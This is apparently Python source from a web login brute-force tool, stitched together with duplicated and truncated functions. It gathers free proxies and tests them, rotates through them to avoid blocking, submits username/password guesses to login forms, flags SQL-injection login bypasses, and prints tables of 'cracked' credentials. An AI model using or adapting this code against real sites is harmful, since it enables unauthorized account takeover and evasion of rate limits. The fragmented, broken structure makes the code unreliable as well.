def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = Browser()
proxyTest.set_random_proxy(proxyAddr)
if verbose:
events.info("Testing %s" % (proxyAddr))
proxyTest.open_url(target)
if verbose:
events.success("Connected via %s" %(proxyAddr), "PROXY")
result.put(proxyAddr)
except KeyboardInterrupt:
events.error("Terminated by user", "STOPPED")
global set_break
set_break = True
except Exception as error:
if verbose:
events.error("[%s] [%s]" % (proxyAddr, error))
finally:
try:
proxyTest.close()
except:
pass
def checkProxyConnProvider(url = "https://free-proxy-list.net/"):
try:
events.info("Gathering proxies from %s" % (url))
getproxy = Browser()
getproxy.open_url(url)
events.success("Gathering proxies completed", "PROXY")
return getproxy.get_response()
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
finally:
getproxy.close()
def getnew(options):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
events.error("%s" % (error), "PROXY")
def checkProxyConnProvider(url = "https://free-proxy-list.net/"):
try:
events.info("Gathering proxies from %s" % (url))
getproxy = Browser()
getproxy.open_url(url)
events.success("Gathering proxies completed", "PROXY")
return getproxy.get_response()
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checkProxyConnProvider())
except Exception as error:
events.error("%s" % (error), "PROXY")
listproxy = ""
finally:
try:
events.success("Gathered %s proxies" % (len(listproxy)), "PROXY")
listproxy = "\n".join(listproxy)
events.info("Saving result to %s" %(PROXY_PATH), "PROXY")
file_write(PROXY_PATH, listproxy)
events.success("New proxy list saved", "PROXY")
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
def check(options):
def run_threads(threads, sending, completed, total):
# Run threads
for thread in threads:
# sending += 1 # Sending
progressbar.progress_bar(sending, completed, total)
thread.start()
# Wait for threads completed
for thread in threads:
completed += 1
progressbar.progress_bar(sending, completed, total)
thread.join()
return completed
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = Browser()
proxyTest.set_random_proxy(proxyAddr)
if verbose:
events.info("Testing %s" % (proxyAddr))
proxyTest.open_url(target)
if verbose:
events.success("Connected via %s" %(proxyAddr), "PROXY")
result.put(proxyAddr)
except KeyboardInterrupt:
events.error("Terminated by user", "STOPPED")
global set_break
set_break = True
except Exception as error:
if verbose:
events.error("[%s] [%s]" % (proxyAddr, error))
finally:
try:
proxyTest.close()
except:
pass
try:
proxylist = file_read(PROXY_PATH).split("\n")
workers = []
completed, total = 0, len(proxylist)
set_break = False
for trying, tryProxy in enumerate(proxylist):
if set_break:
del workers[:]
break
if len(workers) == options.threads:
completed = run_threads(workers, trying, completed, total)
del workers[:]
worker = threading.Thread(
target = checProxyConn,
args = (tryProxy, options.url, result, options.verbose)
)
worker.daemon = True
workers.append(worker)
completed = run_threads(workers, trying, completed, total)
del workers[:]
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
finally:
try:
_data = "\n".join(list(result.queue))
events.success("%s proxy alive" %(len(_data.split("\n"))))
events.info("Saving success list", "PROXY")
file_write(LIVE_PATH, _data)
events.success("New alive list is saved", "PROXY")
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
result = attack(options, loginInfo)
if result:
for _result in result:
results.append(_result)
# results.append(result)
else:
events.error("No login request found")
if "--reauth" in options.extras:
from extras import reauth
reauth.run(options, result)
except Exception as error:
traceback.print_exc()
events.error("%s" % (error), "STOPPED")
sys.exit(1)
finally:
runtime = time.time() - runtime
try:
if len(options.target) > 0:
if len(results) > 0 and len(options.target) > 1:
events.success("Cracked %s target[s]" % (len(results)), "RESULT")
utils.print_table(("URL", "Username", "Password"), *results)
else:
events.error("No target has been cracked", "RESULT")
except:
pass
events.success("Elapsed: %0.2f [-] %s" % (runtime, time.strftime("%Y-%m-%d %H:%M")))
def submit(options, login_field, tryCred, result):
password, username = tryCred
if username in [x[1] for x in list(result.queue)]:
return True
from cores.browser import Browser
isLoginSuccess = "False"
try:
proc = Browser()
if options.proxy:
# Set proxy connect
proxy_address = list_choose_randomly(options.proxy)
proc.set_random_proxy(proxy_address)
else:
proxy_address = ""
proc.open_url(options.url)
_form = find_login_form(proc.forms())
if not _form:
options.block_text = proc.get_response(
) # TODO check if block text changes
if options.verbose:
isLoginSuccess = "blocked"
events.error("Get blocked", "BRUTE")
return False
else:
form_control, form_fields = _form
if options.verbose and login_field != _form:
events.info("Login form has been changed", "BRUTE")
resp = proc.form_submit(form_control, form_fields, tryCred)
from cores.analysis import get_response_diff
text_changed, source_changed = get_response_diff(
options.txt.decode('utf-8'), resp.content.decode('utf-8'))
"""
If there is no other login form, check all changes in response
If there is no login request from all new urls -> successfully
== > Behavior: Login fail, click here or windows.location = login_page
"""
# "Login form is still there. Oops"
if find_login_form(proc.forms()):
isLoginForm = True
else:
isLoginForm = False
if not isLoginForm:
for new_url in get_redirection(source_changed):
if not new_url.startswith("http") and not new_url.endswith(
options.exceptions()):
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
new_url = urljoin(options.url, new_url)
if new_url and get_domain(options.url) == get_domain(new_url):
proc.open_url(new_url)
if find_login_form(proc.forms()):
isLoginForm = True
break
else:
isLoginForm = False
if not isLoginForm:
"""
Check SQL Injection
1. SQL Injection
2. Login successfully: No SQLi + No Login form
"""
if check_sqlerror(proc.get_response()):
isLoginSuccess = "SQLi"
elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
pass
else:
if resp.status_code >= 400:
isLoginSuccess = "error"
else:
isLoginSuccess = "True"
# "If we tried login form with username+password field"
else:
pass
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
isLoginSuccess = "exception"
events.error("%s" % (error), "BRUTE")
finally:
if isLoginSuccess == "SQLi":
events.success("SQL Injection bypass", "BRUTE")
events.info("['%s': '%s']" % (username, password))
elif isLoginSuccess == "error" and options.verbose:
if username:
events.error(
"['%s':'%s'] <--> %s" %
(username, password, proxy_address),
"%s" % (resp.status_code))
else:
events.error("[%s] <--> %s" % (password, proxy_address),
"%s" % (resp.status_code))
elif isLoginSuccess == "True":
if username:
events.found(username, password, proc.get_title())
result.put([options.url, username, password])
else:
events.found('', password, proc.get_title())
result.put([options.url, username, password])
elif isLoginSuccess == "False" and options.verbose:
if username:
events.fail(
"['%s':'%s'] <==> %s" %
(username, password, proxy_address), text_changed,
proc.get_title())
else:
events.fail("['%s'] <==> %s" % (password, proxy_address),
text_changed, proc.get_title())
proc.close()